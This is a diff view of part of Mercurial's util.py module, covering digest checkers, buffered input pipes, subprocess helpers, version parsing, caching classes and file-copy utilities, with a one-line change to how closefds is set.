234 234 >>> d = digester([b'md5', b'sha1'])
235 235 >>> d.update(b'foo')
236 236 >>> [k for k in sorted(d)]
237 237 ['md5', 'sha1']
238 238 >>> d[b'md5']
239 239 'acbd18db4cc2f85cedef654fccc4a4d8'
240 240 >>> d[b'sha1']
241 241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 242 >>> digester.preferred([b'md5', b'sha1'])
243 243 'sha1'
244 244 """
245 245
246 246 def __init__(self, digests, s=''):
247 247 self._hashes = {}
248 248 for k in digests:
249 249 if k not in DIGESTS:
250 250 raise Abort(_('unknown digest type: %s') % k)
251 251 self._hashes[k] = DIGESTS[k]()
252 252 if s:
253 253 self.update(s)
254 254
255 255 def update(self, data):
256 256 for h in self._hashes.values():
257 257 h.update(data)
258 258
259 259 def __getitem__(self, key):
260 260 if key not in DIGESTS:
261 261 raise Abort(_('unknown digest type: %s') % k)
262 262 return self._hashes[key].hexdigest()
263 263
264 264 def __iter__(self):
265 265 return iter(self._hashes)
266 266
267 267 @staticmethod
268 268 def preferred(supported):
269 269 """returns the strongest digest type in both supported and DIGESTS."""
270 270
271 271 for k in DIGESTS_BY_STRENGTH:
272 272 if k in supported:
273 273 return k
274 274 return None
275 275
276 276 class digestchecker(object):
277 277 """file handle wrapper that additionally checks content against a given
278 278 size and digests.
279 279
280 280 d = digestchecker(fh, size, {'md5': '...'})
281 281
282 282 When multiple digests are given, all of them are validated.
283 283 """
284 284
285 285 def __init__(self, fh, size, digests):
286 286 self._fh = fh
287 287 self._size = size
288 288 self._got = 0
289 289 self._digests = dict(digests)
290 290 self._digester = digester(self._digests.keys())
291 291
292 292 def read(self, length=-1):
293 293 content = self._fh.read(length)
294 294 self._digester.update(content)
295 295 self._got += len(content)
296 296 return content
297 297
298 298 def validate(self):
299 299 if self._size != self._got:
300 300 raise Abort(_('size mismatch: expected %d, got %d') %
301 301 (self._size, self._got))
302 302 for k, v in self._digests.items():
303 303 if v != self._digester[k]:
304 304 # i18n: first parameter is a digest name
305 305 raise Abort(_('%s mismatch: expected %s, got %s') %
306 306 (k, v, self._digester[k]))
307 307
308 308 try:
309 309 buffer = buffer
310 310 except NameError:
311 311 def buffer(sliceable, offset=0, length=None):
312 312 if length is not None:
313 313 return memoryview(sliceable)[offset:offset + length]
314 314 return memoryview(sliceable)[offset:]
315 315
316 closefds = pycompat.osname == 'posix'
316 closefds = pycompat.isposix
317 317
318 318 _chunksize = 4096
319 319
320 320 class bufferedinputpipe(object):
321 321 """a manually buffered input pipe
322 322
323 323 Python will not let us use buffered IO and lazy reading with 'polling' at
324 324 the same time. We cannot probe the buffer state and select will not detect
325 325 that data are ready to read if they are already buffered.
326 326
327 327 This class let us work around that by implementing its own buffering
328 328 (allowing efficient readline) while offering a way to know if the buffer is
329 329 empty from the output (allowing collaboration of the buffer with polling).
330 330
331 331 This class lives in the 'util' module because it makes use of the 'os'
332 332 module from the python stdlib.
333 333 """
334 334
335 335 def __init__(self, input):
336 336 self._input = input
337 337 self._buffer = []
338 338 self._eof = False
339 339 self._lenbuf = 0
340 340
341 341 @property
342 342 def hasbuffer(self):
343 343 """True is any data is currently buffered
344 344
345 345 This will be used externally a pre-step for polling IO. If there is
346 346 already data then no polling should be set in place."""
347 347 return bool(self._buffer)
348 348
349 349 @property
350 350 def closed(self):
351 351 return self._input.closed
352 352
353 353 def fileno(self):
354 354 return self._input.fileno()
355 355
356 356 def close(self):
357 357 return self._input.close()
358 358
359 359 def read(self, size):
360 360 while (not self._eof) and (self._lenbuf < size):
361 361 self._fillbuffer()
362 362 return self._frombuffer(size)
363 363
364 364 def readline(self, *args, **kwargs):
365 365 if 1 < len(self._buffer):
366 366 # this should not happen because both read and readline end with a
367 367 # _frombuffer call that collapse it.
368 368 self._buffer = [''.join(self._buffer)]
369 369 self._lenbuf = len(self._buffer[0])
370 370 lfi = -1
371 371 if self._buffer:
372 372 lfi = self._buffer[-1].find('\n')
373 373 while (not self._eof) and lfi < 0:
374 374 self._fillbuffer()
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find('\n')
377 377 size = lfi + 1
378 378 if lfi < 0: # end of file
379 379 size = self._lenbuf
380 380 elif 1 < len(self._buffer):
381 381 # we need to take previous chunks into account
382 382 size += self._lenbuf - len(self._buffer[-1])
383 383 return self._frombuffer(size)
384 384
385 385 def _frombuffer(self, size):
386 386 """return at most 'size' data from the buffer
387 387
388 388 The data are removed from the buffer."""
389 389 if size == 0 or not self._buffer:
390 390 return ''
391 391 buf = self._buffer[0]
392 392 if 1 < len(self._buffer):
393 393 buf = ''.join(self._buffer)
394 394
395 395 data = buf[:size]
396 396 buf = buf[len(data):]
397 397 if buf:
398 398 self._buffer = [buf]
399 399 self._lenbuf = len(buf)
400 400 else:
401 401 self._buffer = []
402 402 self._lenbuf = 0
403 403 return data
404 404
405 405 def _fillbuffer(self):
406 406 """read data to the buffer"""
407 407 data = os.read(self._input.fileno(), _chunksize)
408 408 if not data:
409 409 self._eof = True
410 410 else:
411 411 self._lenbuf += len(data)
412 412 self._buffer.append(data)
413 413
414 414 def mmapread(fp):
415 415 try:
416 416 fd = getattr(fp, 'fileno', lambda: fp)()
417 417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 418 except ValueError:
419 419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 420 # if the file is empty, and if so, return an empty buffer.
421 421 if os.fstat(fd).st_size == 0:
422 422 return ''
423 423 raise
424 424
425 425 def popen2(cmd, env=None, newlines=False):
426 426 # Setting bufsize to -1 lets the system decide the buffer size.
427 427 # The default for bufsize is 0, meaning unbuffered. This leads to
428 428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
429 429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
430 430 close_fds=closefds,
431 431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 432 universal_newlines=newlines,
433 433 env=env)
434 434 return p.stdin, p.stdout
435 435
436 436 def popen3(cmd, env=None, newlines=False):
437 437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
438 438 return stdin, stdout, stderr
439 439
440 440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
441 441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
442 442 close_fds=closefds,
443 443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
444 444 stderr=subprocess.PIPE,
445 445 universal_newlines=newlines,
446 446 env=env)
447 447 return p.stdin, p.stdout, p.stderr, p
448 448
449 449 def version():
450 450 """Return version information if available."""
451 451 try:
452 452 from . import __version__
453 453 return __version__.version
454 454 except ImportError:
455 455 return 'unknown'
456 456
457 457 def versiontuple(v=None, n=4):
458 458 """Parses a Mercurial version string into an N-tuple.
459 459
460 460 The version string to be parsed is specified with the ``v`` argument.
461 461 If it isn't defined, the current Mercurial version string will be parsed.
462 462
463 463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
464 464 returned values:
465 465
466 466 >>> v = b'3.6.1+190-df9b73d2d444'
467 467 >>> versiontuple(v, 2)
468 468 (3, 6)
469 469 >>> versiontuple(v, 3)
470 470 (3, 6, 1)
471 471 >>> versiontuple(v, 4)
472 472 (3, 6, 1, '190-df9b73d2d444')
473 473
474 474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
475 475 (3, 6, 1, '190-df9b73d2d444+20151118')
476 476
477 477 >>> v = b'3.6'
478 478 >>> versiontuple(v, 2)
479 479 (3, 6)
480 480 >>> versiontuple(v, 3)
481 481 (3, 6, None)
482 482 >>> versiontuple(v, 4)
483 483 (3, 6, None, None)
484 484
485 485 >>> v = b'3.9-rc'
486 486 >>> versiontuple(v, 2)
487 487 (3, 9)
488 488 >>> versiontuple(v, 3)
489 489 (3, 9, None)
490 490 >>> versiontuple(v, 4)
491 491 (3, 9, None, 'rc')
492 492
493 493 >>> v = b'3.9-rc+2-02a8fea4289b'
494 494 >>> versiontuple(v, 2)
495 495 (3, 9)
496 496 >>> versiontuple(v, 3)
497 497 (3, 9, None)
498 498 >>> versiontuple(v, 4)
499 499 (3, 9, None, 'rc+2-02a8fea4289b')
500 500 """
501 501 if not v:
502 502 v = version()
503 503 parts = remod.split('[\+-]', v, 1)
504 504 if len(parts) == 1:
505 505 vparts, extra = parts[0], None
506 506 else:
507 507 vparts, extra = parts
508 508
509 509 vints = []
510 510 for i in vparts.split('.'):
511 511 try:
512 512 vints.append(int(i))
513 513 except ValueError:
514 514 break
515 515 # (3, 6) -> (3, 6, None)
516 516 while len(vints) < 3:
517 517 vints.append(None)
518 518
519 519 if n == 2:
520 520 return (vints[0], vints[1])
521 521 if n == 3:
522 522 return (vints[0], vints[1], vints[2])
523 523 if n == 4:
524 524 return (vints[0], vints[1], vints[2], extra)
525 525
526 526 # used by parsedate
527 527 defaultdateformats = (
528 528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
529 529 '%Y-%m-%dT%H:%M', # without seconds
530 530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
531 531 '%Y-%m-%dT%H%M', # without seconds
532 532 '%Y-%m-%d %H:%M:%S', # our common legal variant
533 533 '%Y-%m-%d %H:%M', # without seconds
534 534 '%Y-%m-%d %H%M%S', # without :
535 535 '%Y-%m-%d %H%M', # without seconds
536 536 '%Y-%m-%d %I:%M:%S%p',
537 537 '%Y-%m-%d %H:%M',
538 538 '%Y-%m-%d %I:%M%p',
539 539 '%Y-%m-%d',
540 540 '%m-%d',
541 541 '%m/%d',
542 542 '%m/%d/%y',
543 543 '%m/%d/%Y',
544 544 '%a %b %d %H:%M:%S %Y',
545 545 '%a %b %d %I:%M:%S%p %Y',
546 546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
547 547 '%b %d %H:%M:%S %Y',
548 548 '%b %d %I:%M:%S%p %Y',
549 549 '%b %d %H:%M:%S',
550 550 '%b %d %I:%M:%S%p',
551 551 '%b %d %H:%M',
552 552 '%b %d %I:%M%p',
553 553 '%b %d %Y',
554 554 '%b %d',
555 555 '%H:%M:%S',
556 556 '%I:%M:%S%p',
557 557 '%H:%M',
558 558 '%I:%M%p',
559 559 )
560 560
561 561 extendeddateformats = defaultdateformats + (
562 562 "%Y",
563 563 "%Y-%m",
564 564 "%b",
565 565 "%b %Y",
566 566 )
567 567
568 568 def cachefunc(func):
569 569 '''cache the result of function calls'''
570 570 # XXX doesn't handle keywords args
571 571 if func.__code__.co_argcount == 0:
572 572 cache = []
573 573 def f():
574 574 if len(cache) == 0:
575 575 cache.append(func())
576 576 return cache[0]
577 577 return f
578 578 cache = {}
579 579 if func.__code__.co_argcount == 1:
580 580 # we gain a small amount of time because
581 581 # we don't need to pack/unpack the list
582 582 def f(arg):
583 583 if arg not in cache:
584 584 cache[arg] = func(arg)
585 585 return cache[arg]
586 586 else:
587 587 def f(*args):
588 588 if args not in cache:
589 589 cache[args] = func(*args)
590 590 return cache[args]
591 591
592 592 return f
593 593
594 594 class cow(object):
595 595 """helper class to make copy-on-write easier
596 596
597 597 Call preparewrite before doing any writes.
598 598 """
599 599
600 600 def preparewrite(self):
601 601 """call this before writes, return self or a copied new object"""
602 602 if getattr(self, '_copied', 0):
603 603 self._copied -= 1
604 604 return self.__class__(self)
605 605 return self
606 606
607 607 def copy(self):
608 608 """always do a cheap copy"""
609 609 self._copied = getattr(self, '_copied', 0) + 1
610 610 return self
611 611
612 612 class sortdict(collections.OrderedDict):
613 613 '''a simple sorted dictionary
614 614
615 615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
616 616 >>> d2 = d1.copy()
617 617 >>> d2
618 618 sortdict([('a', 0), ('b', 1)])
619 619 >>> d2.update([(b'a', 2)])
620 620 >>> list(d2.keys()) # should still be in last-set order
621 621 ['b', 'a']
622 622 '''
623 623
624 624 def __setitem__(self, key, value):
625 625 if key in self:
626 626 del self[key]
627 627 super(sortdict, self).__setitem__(key, value)
628 628
629 629 if pycompat.ispypy:
630 630 # __setitem__() isn't called as of PyPy 5.8.0
631 631 def update(self, src):
632 632 if isinstance(src, dict):
633 633 src = src.iteritems()
634 634 for k, v in src:
635 635 self[k] = v
636 636
637 637 class cowdict(cow, dict):
638 638 """copy-on-write dict
639 639
640 640 Be sure to call d = d.preparewrite() before writing to d.
641 641
642 642 >>> a = cowdict()
643 643 >>> a is a.preparewrite()
644 644 True
645 645 >>> b = a.copy()
646 646 >>> b is a
647 647 True
648 648 >>> c = b.copy()
649 649 >>> c is a
650 650 True
651 651 >>> a = a.preparewrite()
652 652 >>> b is a
653 653 False
654 654 >>> a is a.preparewrite()
655 655 True
656 656 >>> c = c.preparewrite()
657 657 >>> b is c
658 658 False
659 659 >>> b is b.preparewrite()
660 660 True
661 661 """
662 662
663 663 class cowsortdict(cow, sortdict):
664 664 """copy-on-write sortdict
665 665
666 666 Be sure to call d = d.preparewrite() before writing to d.
667 667 """
668 668
669 669 class transactional(object):
670 670 """Base class for making a transactional type into a context manager."""
671 671 __metaclass__ = abc.ABCMeta
672 672
673 673 @abc.abstractmethod
674 674 def close(self):
675 675 """Successfully closes the transaction."""
676 676
677 677 @abc.abstractmethod
678 678 def release(self):
679 679 """Marks the end of the transaction.
680 680
681 681 If the transaction has not been closed, it will be aborted.
682 682 """
683 683
684 684 def __enter__(self):
685 685 return self
686 686
687 687 def __exit__(self, exc_type, exc_val, exc_tb):
688 688 try:
689 689 if exc_type is None:
690 690 self.close()
691 691 finally:
692 692 self.release()
693 693
694 694 @contextlib.contextmanager
695 695 def acceptintervention(tr=None):
696 696 """A context manager that closes the transaction on InterventionRequired
697 697
698 698 If no transaction was provided, this simply runs the body and returns
699 699 """
700 700 if not tr:
701 701 yield
702 702 return
703 703 try:
704 704 yield
705 705 tr.close()
706 706 except error.InterventionRequired:
707 707 tr.close()
708 708 raise
709 709 finally:
710 710 tr.release()
711 711
712 712 @contextlib.contextmanager
713 713 def nullcontextmanager():
714 714 yield
715 715
716 716 class _lrucachenode(object):
717 717 """A node in a doubly linked list.
718 718
719 719 Holds a reference to nodes on either side as well as a key-value
720 720 pair for the dictionary entry.
721 721 """
722 722 __slots__ = (u'next', u'prev', u'key', u'value')
723 723
724 724 def __init__(self):
725 725 self.next = None
726 726 self.prev = None
727 727
728 728 self.key = _notset
729 729 self.value = None
730 730
731 731 def markempty(self):
732 732 """Mark the node as emptied."""
733 733 self.key = _notset
734 734
735 735 class lrucachedict(object):
736 736 """Dict that caches most recent accesses and sets.
737 737
738 738 The dict consists of an actual backing dict - indexed by original
739 739 key - and a doubly linked circular list defining the order of entries in
740 740 the cache.
741 741
742 742 The head node is the newest entry in the cache. If the cache is full,
743 743 we recycle head.prev and make it the new head. Cache accesses result in
744 744 the node being moved to before the existing head and being marked as the
745 745 new head node.
746 746 """
747 747 def __init__(self, max):
748 748 self._cache = {}
749 749
750 750 self._head = head = _lrucachenode()
751 751 head.prev = head
752 752 head.next = head
753 753 self._size = 1
754 754 self._capacity = max
755 755
756 756 def __len__(self):
757 757 return len(self._cache)
758 758
759 759 def __contains__(self, k):
760 760 return k in self._cache
761 761
762 762 def __iter__(self):
763 763 # We don't have to iterate in cache order, but why not.
764 764 n = self._head
765 765 for i in range(len(self._cache)):
766 766 yield n.key
767 767 n = n.next
768 768
769 769 def __getitem__(self, k):
770 770 node = self._cache[k]
771 771 self._movetohead(node)
772 772 return node.value
773 773
774 774 def __setitem__(self, k, v):
775 775 node = self._cache.get(k)
776 776 # Replace existing value and mark as newest.
777 777 if node is not None:
778 778 node.value = v
779 779 self._movetohead(node)
780 780 return
781 781
782 782 if self._size < self._capacity:
783 783 node = self._addcapacity()
784 784 else:
785 785 # Grab the last/oldest item.
786 786 node = self._head.prev
787 787
788 788 # At capacity. Kill the old entry.
789 789 if node.key is not _notset:
790 790 del self._cache[node.key]
791 791
792 792 node.key = k
793 793 node.value = v
794 794 self._cache[k] = node
795 795 # And mark it as newest entry. No need to adjust order since it
796 796 # is already self._head.prev.
797 797 self._head = node
798 798
799 799 def __delitem__(self, k):
800 800 node = self._cache.pop(k)
801 801 node.markempty()
802 802
803 803 # Temporarily mark as newest item before re-adjusting head to make
804 804 # this node the oldest item.
805 805 self._movetohead(node)
806 806 self._head = node.next
807 807
808 808 # Additional dict methods.
809 809
810 810 def get(self, k, default=None):
811 811 try:
812 812 return self._cache[k].value
813 813 except KeyError:
814 814 return default
815 815
816 816 def clear(self):
817 817 n = self._head
818 818 while n.key is not _notset:
819 819 n.markempty()
820 820 n = n.next
821 821
822 822 self._cache.clear()
823 823
824 824 def copy(self):
825 825 result = lrucachedict(self._capacity)
826 826 n = self._head.prev
827 827 # Iterate in oldest-to-newest order, so the copy has the right ordering
828 828 for i in range(len(self._cache)):
829 829 result[n.key] = n.value
830 830 n = n.prev
831 831 return result
832 832
833 833 def _movetohead(self, node):
834 834 """Mark a node as the newest, making it the new head.
835 835
836 836 When a node is accessed, it becomes the freshest entry in the LRU
837 837 list, which is denoted by self._head.
838 838
839 839 Visually, let's make ``N`` the new head node (* denotes head):
840 840
841 841 previous/oldest <-> head <-> next/next newest
842 842
843 843 ----<->--- A* ---<->-----
844 844 | |
845 845 E <-> D <-> N <-> C <-> B
846 846
847 847 To:
848 848
849 849 ----<->--- N* ---<->-----
850 850 | |
851 851 E <-> D <-> C <-> B <-> A
852 852
853 853 This requires the following moves:
854 854
855 855 C.next = D (node.prev.next = node.next)
856 856 D.prev = C (node.next.prev = node.prev)
857 857 E.next = N (head.prev.next = node)
858 858 N.prev = E (node.prev = head.prev)
859 859 N.next = A (node.next = head)
860 860 A.prev = N (head.prev = node)
861 861 """
862 862 head = self._head
863 863 # C.next = D
864 864 node.prev.next = node.next
865 865 # D.prev = C
866 866 node.next.prev = node.prev
867 867 # N.prev = E
868 868 node.prev = head.prev
869 869 # N.next = A
870 870 # It is tempting to do just "head" here, however if node is
871 871 # adjacent to head, this will do bad things.
872 872 node.next = head.prev.next
873 873 # E.next = N
874 874 node.next.prev = node
875 875 # A.prev = N
876 876 node.prev.next = node
877 877
878 878 self._head = node
879 879
880 880 def _addcapacity(self):
881 881 """Add a node to the circular linked list.
882 882
883 883 The new node is inserted before the head node.
884 884 """
885 885 head = self._head
886 886 node = _lrucachenode()
887 887 head.prev.next = node
888 888 node.prev = head.prev
889 889 node.next = head
890 890 head.prev = node
891 891 self._size += 1
892 892 return node
893 893
894 894 def lrucachefunc(func):
895 895 '''cache most recent results of function calls'''
896 896 cache = {}
897 897 order = collections.deque()
898 898 if func.__code__.co_argcount == 1:
899 899 def f(arg):
900 900 if arg not in cache:
901 901 if len(cache) > 20:
902 902 del cache[order.popleft()]
903 903 cache[arg] = func(arg)
904 904 else:
905 905 order.remove(arg)
906 906 order.append(arg)
907 907 return cache[arg]
908 908 else:
909 909 def f(*args):
910 910 if args not in cache:
911 911 if len(cache) > 20:
912 912 del cache[order.popleft()]
913 913 cache[args] = func(*args)
914 914 else:
915 915 order.remove(args)
916 916 order.append(args)
917 917 return cache[args]
918 918
919 919 return f
920 920
921 921 class propertycache(object):
922 922 def __init__(self, func):
923 923 self.func = func
924 924 self.name = func.__name__
925 925 def __get__(self, obj, type=None):
926 926 result = self.func(obj)
927 927 self.cachevalue(obj, result)
928 928 return result
929 929
930 930 def cachevalue(self, obj, value):
931 931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
932 932 obj.__dict__[self.name] = value
933 933
934 934 def pipefilter(s, cmd):
935 935 '''filter string S through command CMD, returning its output'''
936 936 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
937 937 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
938 938 pout, perr = p.communicate(s)
939 939 return pout
940 940
941 941 def tempfilter(s, cmd):
942 942 '''filter string S through a pair of temporary files with CMD.
943 943 CMD is used as a template to create the real command to be run,
944 944 with the strings INFILE and OUTFILE replaced by the real names of
945 945 the temporary files generated.'''
946 946 inname, outname = None, None
947 947 try:
948 948 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
949 949 fp = os.fdopen(infd, pycompat.sysstr('wb'))
950 950 fp.write(s)
951 951 fp.close()
952 952 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
953 953 os.close(outfd)
954 954 cmd = cmd.replace('INFILE', inname)
955 955 cmd = cmd.replace('OUTFILE', outname)
956 956 code = os.system(cmd)
957 957 if pycompat.sysplatform == 'OpenVMS' and code & 1:
958 958 code = 0
959 959 if code:
960 960 raise Abort(_("command '%s' failed: %s") %
961 961 (cmd, explainexit(code)))
962 962 return readfile(outname)
963 963 finally:
964 964 try:
965 965 if inname:
966 966 os.unlink(inname)
967 967 except OSError:
968 968 pass
969 969 try:
970 970 if outname:
971 971 os.unlink(outname)
972 972 except OSError:
973 973 pass
974 974
975 975 filtertable = {
976 976 'tempfile:': tempfilter,
977 977 'pipe:': pipefilter,
978 978 }
979 979
980 980 def filter(s, cmd):
981 981 "filter a string through a command that transforms its input to its output"
982 982 for name, fn in filtertable.iteritems():
983 983 if cmd.startswith(name):
984 984 return fn(s, cmd[len(name):].lstrip())
985 985 return pipefilter(s, cmd)
986 986
987 987 def binary(s):
988 988 """return true if a string is binary data"""
989 989 return bool(s and '\0' in s)
990 990
991 991 def increasingchunks(source, min=1024, max=65536):
992 992 '''return no less than min bytes per chunk while data remains,
993 993 doubling min after each chunk until it reaches max'''
994 994 def log2(x):
995 995 if not x:
996 996 return 0
997 997 i = 0
998 998 while x:
999 999 x >>= 1
1000 1000 i += 1
1001 1001 return i - 1
1002 1002
1003 1003 buf = []
1004 1004 blen = 0
1005 1005 for chunk in source:
1006 1006 buf.append(chunk)
1007 1007 blen += len(chunk)
1008 1008 if blen >= min:
1009 1009 if min < max:
1010 1010 min = min << 1
1011 1011 nmin = 1 << log2(blen)
1012 1012 if nmin > min:
1013 1013 min = nmin
1014 1014 if min > max:
1015 1015 min = max
1016 1016 yield ''.join(buf)
1017 1017 blen = 0
1018 1018 buf = []
1019 1019 if buf:
1020 1020 yield ''.join(buf)
1021 1021
1022 1022 Abort = error.Abort
1023 1023
1024 1024 def always(fn):
1025 1025 return True
1026 1026
1027 1027 def never(fn):
1028 1028 return False
1029 1029
1030 1030 def nogc(func):
1031 1031 """disable garbage collector
1032 1032
1033 1033 Python's garbage collector triggers a GC each time a certain number of
1034 1034 container objects (the number being defined by gc.get_threshold()) are
1035 1035 allocated even when marked not to be tracked by the collector. Tracking has
1036 1036 no effect on when GCs are triggered, only on what objects the GC looks
1037 1037 into. As a workaround, disable GC while building complex (huge)
1038 1038 containers.
1039 1039
1040 1040 This garbage collector issue have been fixed in 2.7. But it still affect
1041 1041 CPython's performance.
1042 1042 """
1043 1043 def wrapper(*args, **kwargs):
1044 1044 gcenabled = gc.isenabled()
1045 1045 gc.disable()
1046 1046 try:
1047 1047 return func(*args, **kwargs)
1048 1048 finally:
1049 1049 if gcenabled:
1050 1050 gc.enable()
1051 1051 return wrapper
1052 1052
1053 1053 if pycompat.ispypy:
1054 1054 # PyPy runs slower with gc disabled
1055 1055 nogc = lambda x: x
1056 1056
1057 1057 def pathto(root, n1, n2):
1058 1058 '''return the relative path from one place to another.
1059 1059 root should use os.sep to separate directories
1060 1060 n1 should use os.sep to separate directories
1061 1061 n2 should use "/" to separate directories
1062 1062 returns an os.sep-separated path.
1063 1063
1064 1064 If n1 is a relative path, it's assumed it's
1065 1065 relative to root.
1066 1066 n2 should always be relative to root.
1067 1067 '''
1068 1068 if not n1:
1069 1069 return localpath(n2)
1070 1070 if os.path.isabs(n1):
1071 1071 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1072 1072 return os.path.join(root, localpath(n2))
1073 1073 n2 = '/'.join((pconvert(root), n2))
1074 1074 a, b = splitpath(n1), n2.split('/')
1075 1075 a.reverse()
1076 1076 b.reverse()
1077 1077 while a and b and a[-1] == b[-1]:
1078 1078 a.pop()
1079 1079 b.pop()
1080 1080 b.reverse()
1081 1081 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082 1082
1083 1083 def mainfrozen():
1084 1084 """return True if we are a frozen executable.
1085 1085
1086 1086 The code supports py2exe (most common, Windows only) and tools/freeze
1087 1087 (portable, not much used).
1088 1088 """
1089 1089 return (safehasattr(sys, "frozen") or # new py2exe
1090 1090 safehasattr(sys, "importers") or # old py2exe
1091 1091 imp.is_frozen(u"__main__")) # tools/freeze
1092 1092
1093 1093 # the location of data files matching the source code
1094 1094 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1095 1095 # executable version (py2exe) doesn't support __file__
1096 1096 datapath = os.path.dirname(pycompat.sysexecutable)
1097 1097 else:
1098 1098 datapath = os.path.dirname(pycompat.fsencode(__file__))
1099 1099
1100 1100 i18n.setdatapath(datapath)
1101 1101
1102 1102 _hgexecutable = None
1103 1103
1104 1104 def hgexecutable():
1105 1105 """return location of the 'hg' executable.
1106 1106
1107 1107 Defaults to $HG or 'hg' in the search path.
1108 1108 """
1109 1109 if _hgexecutable is None:
1110 1110 hg = encoding.environ.get('HG')
1111 1111 mainmod = sys.modules[pycompat.sysstr('__main__')]
1112 1112 if hg:
1113 1113 _sethgexecutable(hg)
1114 1114 elif mainfrozen():
1115 1115 if getattr(sys, 'frozen', None) == 'macosx_app':
1116 1116 # Env variable set by py2app
1117 1117 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1118 1118 else:
1119 1119 _sethgexecutable(pycompat.sysexecutable)
1120 1120 elif (os.path.basename(
1121 1121 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1122 1122 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1123 1123 else:
1124 1124 exe = findexe('hg') or os.path.basename(sys.argv[0])
1125 1125 _sethgexecutable(exe)
1126 1126 return _hgexecutable
1127 1127
1128 1128 def _sethgexecutable(path):
1129 1129 """set location of the 'hg' executable"""
1130 1130 global _hgexecutable
1131 1131 _hgexecutable = path
1132 1132
1133 1133 def _isstdout(f):
1134 1134 fileno = getattr(f, 'fileno', None)
1135 1135 return fileno and fileno() == sys.__stdout__.fileno()
1136 1136
1137 1137 def shellenviron(environ=None):
1138 1138 """return environ with optional override, useful for shelling out"""
1139 1139 def py2shell(val):
1140 1140 'convert python object into string that is useful to shell'
1141 1141 if val is None or val is False:
1142 1142 return '0'
1143 1143 if val is True:
1144 1144 return '1'
1145 1145 return str(val)
1146 1146 env = dict(encoding.environ)
1147 1147 if environ:
1148 1148 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1149 1149 env['HG'] = hgexecutable()
1150 1150 return env
1151 1151
1152 1152 def system(cmd, environ=None, cwd=None, out=None):
1153 1153 '''enhanced shell command execution.
1154 1154 run with environment maybe modified, maybe in different dir.
1155 1155
1156 1156 if out is specified, it is assumed to be a file-like object that has a
1157 1157 write() method. stdout and stderr will be redirected to out.'''
1158 1158 try:
1159 1159 stdout.flush()
1160 1160 except Exception:
1161 1161 pass
1162 1162 cmd = quotecommand(cmd)
1163 1163 env = shellenviron(environ)
1164 1164 if out is None or _isstdout(out):
1165 1165 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1166 1166 env=env, cwd=cwd)
1167 1167 else:
1168 1168 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1169 1169 env=env, cwd=cwd, stdout=subprocess.PIPE,
1170 1170 stderr=subprocess.STDOUT)
1171 1171 for line in iter(proc.stdout.readline, ''):
1172 1172 out.write(line)
1173 1173 proc.wait()
1174 1174 rc = proc.returncode
1175 1175 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1176 1176 rc = 0
1177 1177 return rc
1178 1178
1179 1179 def checksignature(func):
1180 1180 '''wrap a function with code to check for calling errors'''
1181 1181 def check(*args, **kwargs):
1182 1182 try:
1183 1183 return func(*args, **kwargs)
1184 1184 except TypeError:
1185 1185 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1186 1186 raise error.SignatureError
1187 1187 raise
1188 1188
1189 1189 return check
1190 1190
1191 1191 # a whilelist of known filesystems where hardlink works reliably
1192 1192 _hardlinkfswhitelist = {
1193 1193 'btrfs',
1194 1194 'ext2',
1195 1195 'ext3',
1196 1196 'ext4',
1197 1197 'hfs',
1198 1198 'jfs',
1199 1199 'reiserfs',
1200 1200 'tmpfs',
1201 1201 'ufs',
1202 1202 'xfs',
1203 1203 'zfs',
1204 1204 }
1205 1205
1206 1206 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1207 1207 '''copy a file, preserving mode and optionally other stat info like
1208 1208 atime/mtime
1209 1209
1210 1210 checkambig argument is used with filestat, and is useful only if
1211 1211 destination file is guarded by any lock (e.g. repo.lock or
1212 1212 repo.wlock).
1213 1213
1214 1214 copystat and checkambig should be exclusive.
1215 1215 '''
1216 1216 assert not (copystat and checkambig)
1217 1217 oldstat = None
1218 1218 if os.path.lexists(dest):
1219 1219 if checkambig:
1220 1220 oldstat = checkambig and filestat.frompath(dest)
1221 1221 unlink(dest)
1222 1222 if hardlink:
1223 1223 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1224 1224 # unless we are confident that dest is on a whitelisted filesystem.
1225 1225 try:
1226 1226 fstype = getfstype(os.path.dirname(dest))
1227 1227 except OSError:
1228 1228 fstype = None
1229 1229 if fstype not in _hardlinkfswhitelist:
1230 1230 hardlink = False
1231 1231 if hardlink:
1232 1232 try:
1233 1233 oslink(src, dest)
1234 1234 return
1235 1235 except (IOError, OSError):
1236 1236 pass # fall back to normal copy
1237 1237 if os.path.islink(src):
1238 1238 os.symlink(os.readlink(src), dest)
1239 1239 # copytime is ignored for symlinks, but in general copytime isn't needed
1240 1240 # for them anyway
1241 1241 else:
1242 1242 try:
1243 1243 shutil.copyfile(src, dest)
1244 1244 if copystat:
1245 1245 # copystat also copies mode
